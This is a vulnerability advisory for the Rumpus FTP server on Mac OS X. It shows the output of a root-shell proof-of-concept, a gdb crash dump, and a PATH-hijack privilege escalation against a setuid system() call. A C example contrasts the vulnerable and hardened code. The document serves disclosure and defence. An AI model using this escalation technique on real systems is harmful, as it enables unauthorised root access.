The following description is provided by the vendor (Maxum Development Corporation):
If you need to allow people from within your office or across the Internet to send, receive, and manage files on a central Mac, Rumpus FTP is what you are looking for. Rumpus is perfect for print, media or design shops, and is the answer to education and corporate file sharing needs. Rumpus FTP can handle virtually any Internet file transfer task by working with standard FTP and Web clients on any platform, and do it with remarkable ease.
rumpusd is vulnerable to several remotely exploitable heap-based buffer overflows,
denial of service conditions and local privilege escalation issues.
Because rumpusd runs with root privileges, successful exploitation by an
unprivileged user would allow a full compromise of the system.
Most of these issues are in FTP and HTTP request parsing; the rest stem from insecure use of the
system() function and from incorrect permissions and/or handling of setuid binaries.
Rumpus 5.1 and earlier, on Mac OS X 10.4.8 (8L2127). Tested on both PowerPC- and x86-based OS X.
Proof of concept, exploit or instructions to reproduce
The provided proof of concept exercises one of the local privilege escalation issues and a separate (post-authentication) problem in the handling of the FTP LIST command.
$ ruby MOAB-18-01-2007.rb [selected issue]

example:

$ ruby bug-files/MOAB-18-01-2007.rb 1
++ Local privilege escalation...
++ Enjoy root shell...
sh-2.05b# id
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)
Note: The local privilege escalation exploit doesn't replace any files on the filesystem.
The following debugging information shows the result of launching the proof of concept against the FTP service, followed by the permissions and other information on the Rumpus binaries. The crash is a read through an attacker-controlled pointer: edx holds 0x33616263 (four printable ASCII bytes from the request) and the faulting instruction indexes memory through it. In the directory listing, note the setuid/setgid root rumpusd and the world-writable files (Rumpus.conf, Rumpus.users, Rumpus.types and the WFMTemplates directory).
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x33616263
[Switching to process 989 thread 0x3703]
0x00009fa5 in ?? ()
(gdb) i r
eax            0x0         0
ecx            0x0         0
edx            0x33616263  862020195
ebx            0x100007f   16777343
esp            0xb060aa50  0xb060aa50
ebp            0xb060aa78  0xb060aa78
esi            0x0         0
edi            0x0         0
eip            0x9fa5      0x9fa5
eflags         0x10297     66199
cs             0x17        23
ss             0x1f        31
ds             0x1f        31
es             0x1f        31
fs             0x0         0
gs             0x37        55
(gdb) x/i $eip
0x9fa5: mov    (%edx,%eax,4),%eax
(gdb) x/10x $ebp
0xb0c16a78:     0xb0c16eb8      0x0000f68f      0x33616263      0x72646972
0xb0c16a88:     0xb0c16ef8      0xb0c16ea4      0x00000000      0x00000000
0xb0c16a98:     0x00000000      0x00000000
(gdb) i f
Stack level 0, frame at 0xb0c16a54:
 eip = 0x9fa5; saved eip 0x0
 called by frame at 0x9f9e
 Arglist at 0xb0c16a4c, args:
 Locals at 0xb0c16a4c, Previous frame's sp is 0xb0c16a54
 Saved registers:
  ebp at 0xb0c16a4c, eip at 0xb0c16a50

$ ls -l /usr/local/Rumpus/
total 1912
drwxr-xr-x    7 root  wheel     238 Jan 19 08:35 Logs
-rw-r--r--    1 root  wheel     790 Jan 19 00:38 Mac2Web.txt
-rw-r--r--    1 root  wheel    2144 Jan 17 14:51 Messages.txt
-rw-rw-rw-    1 root  wheel    3128 Jan 19 07:43 Rumpus.conf
-rw-rw-rw-    1 root  wheel       0 Jan 19 00:38 Rumpus.fsets
-rw-rw-rw-    1 root  wheel       0 Jan 19 00:38 Rumpus.notices
-rw-r--r--    1 root  wheel       3 Jan 19 08:50 Rumpus.pid
-rw-rw-rw-    1 root  wheel       0 Jan 19 00:38 Rumpus.rips
-rw-r--r--    1 root  wheel    8112 Jan 19 00:38 Rumpus.strings
-rw-rw-rw-    1 root  wheel    1456 Jan 19 00:38 Rumpus.types
-rw-rw-rw-    1 root  wheel     200 Jan 19 07:45 Rumpus.users
-rw-r--r--    1 root  wheel      31 Jan 19 08:36 Rumpus.userstats
drwxrwxrwx   46 root  wheel    1564 Jan 19 00:38 WFMTemplates
-rw-r--r--    1 root  wheel     939 Jan 19 00:38 Web2Mac.txt
-rwsr-sr-x    1 root  wheel  934244 Jan 19 00:38 rumpusd

$ strings /usr/local/Rumpus/rumpusd | grep ipfw
ipfw list > /usr/local/Rumpus/Rumpus.ipfw
/usr/local/Rumpus/Rumpus.ipfw
ipfw list > /usr/local/Rumpus/Rumpus.ipfw
/usr/local/Rumpus/Rumpus.ipfw
rumpusd makes the (old, yet still common) mistake of calling the system() function with a command
that does not use absolute paths: the strings above show it runs "ipfw list > /usr/local/Rumpus/Rumpus.ipfw",
so the shell spawned by system() resolves "ipfw" through the PATH inherited from the invoking user.
Since rumpusd is setuid root (-rwsr-sr-x), a local user who puts a directory of their own first in PATH
and drops an "ipfw" there gets that program executed as root.
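The pattern and its fix, as an added example that is not part of the original advisory or of Rumpus: the vulnerable routine mirrors the rumpusd string above (system() with a relative command name), and the hardened routine uses fork/execve with an absolute path, a fixed environment and privileges dropped to the real uid before exec. The temporary directory, the fake "ipfw" shell script and /bin/echo standing in for the real tool are constructed test fixtures, and all function names are assumptions.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern, modelled on the "ipfw list > ..." string in rumpusd:
 * the command name is relative, so the /bin/sh spawned by system() resolves
 * it through the caller's PATH; inside a setuid-root binary the child runs
 * with euid 0, so whoever controls PATH controls what runs as root. */
int dump_ipfw_vulnerable(const char *outfile) {
    char cmd[512];
    snprintf(cmd, sizeof cmd, "ipfw list > %s", outfile);
    return system(cmd);
}

/* Hardened pattern: absolute path, no shell, a fixed environment, and
 * privileges dropped to the real uid/gid before exec. Returns the child's
 * exit status, or -1 if it could not be run; a failed execve never falls
 * back to a PATH search. Exit code 127 is reserved here for "exec failed". */
int dump_ipfw_hardened(const char *ipfw_path, const char *outfile) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = {"ipfw", "list", NULL};
        char *const envp[] = {"PATH=/usr/sbin:/sbin:/usr/bin:/bin", NULL};
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(127);
        int fd = open(outfile, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0600);
        if (fd < 0 || dup2(fd, STDOUT_FILENO) < 0) _exit(127);
        close(fd);
        execve(ipfw_path, argv, envp);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status) == 127 ? -1 : WEXITSTATUS(status);
}

/* Constructed fixture (assumption, not from the advisory): a throwaway
 * directory with a fake "ipfw" shell script standing in for an attacker's
 * planted binary, prepended to PATH. dir must hold 64 bytes, out 128. */
static int plant_fake_ipfw(char *dir, char *out) {
    char fake[160], path[4096];
    strcpy(dir, "/tmp/moab18-XXXXXX");
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(fake, sizeof fake, "%s/ipfw", dir);
    snprintf(out, 128, "%s/Rumpus.ipfw", dir);
    FILE *f = fopen(fake, "w");
    if (!f) return -1;
    fputs("#!/bin/sh\necho hijacked\n", f);
    fclose(f);
    if (chmod(fake, 0755) != 0) return -1;
    const char *old = getenv("PATH");
    snprintf(path, sizeof path, "%s:%s", dir, old ? old : "/usr/bin:/bin");
    return setenv("PATH", path, 1);
}

/* Reads the first line of the output file into buf (empty if unreadable),
 * then removes the fixture directory. */
static void read_and_cleanup(const char *dir, const char *out, char *buf, size_t n) {
    char fake[160];
    buf[0] = '\0';
    FILE *f = fopen(out, "r");
    if (f) { if (fgets(buf, n, f)) buf[strcspn(buf, "\n")] = '\0'; fclose(f); }
    snprintf(fake, sizeof fake, "%s/ipfw", dir);
    unlink(fake); unlink(out); rmdir(dir);
}

/* Vulnerable routine with the planted PATH: returns 1 if the fake ran. */
int demo_path_hijack(void) {
    char dir[64], out[128], line[64];
    if (plant_fake_ipfw(dir, out) != 0) return -1;
    dump_ipfw_vulnerable(out);
    read_and_cleanup(dir, out, line, sizeof line);
    return strcmp(line, "hijacked") == 0;
}

/* Same planted PATH, hardened routine with an absolute path: the fake is
 * ignored. /bin/echo stands in for the real tool, so the output is "list". */
int demo_hardened_ignores_path(void) {
    char dir[64], out[128], line[64];
    if (plant_fake_ipfw(dir, out) != 0) return -1;
    int rc = dump_ipfw_hardened("/bin/echo", out);
    read_and_cleanup(dir, out, line, sizeof line);
    return rc == 0 && strcmp(line, "list") == 0;
}

int main(void) {
    printf("system(\"ipfw ...\") hijacked via PATH: %d\n", demo_path_hijack());
    printf("execve with absolute path hijacked:  %d\n", !demo_hardened_ignores_path());
    printf("missing absolute binary -> status:   %d\n",
           dump_ipfw_hardened("/nonexistent/ipfw", "/dev/null"));
    return 0;
}
```

Dropping to the real uid before exec matters as much as the absolute path: even with PATH fixed, a helper run as root from a setuid binary inherits every other environment variable and open descriptor the invoking user chose, which is why the hardened routine passes an explicit envp and only redirects stdout to a file it opened itself with O_NOFOLLOW.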
The Rumpus local privilege escalation issues do not require membership of the admin group. The FTP service flaws, mostly heap buffer overflows, require authentication first (anonymous access suffices). The HTTP service flaws can be abused without any form of authentication.
Workaround or temporary solution
To prevent exploitation of the remote issues, restrict access to the Rumpus services from
untrusted hosts until the vendor releases a patch. There is no workaround for some of the
local privilege escalation issues, because they rely on misuse of the system()
function and not just 'insecure' permissions (although patching the binary is feasible). The
permission-related problems can be reduced by removing world write access from the files and
directories under /usr/local/Rumpus shown above.
Use an alternative file sharing method.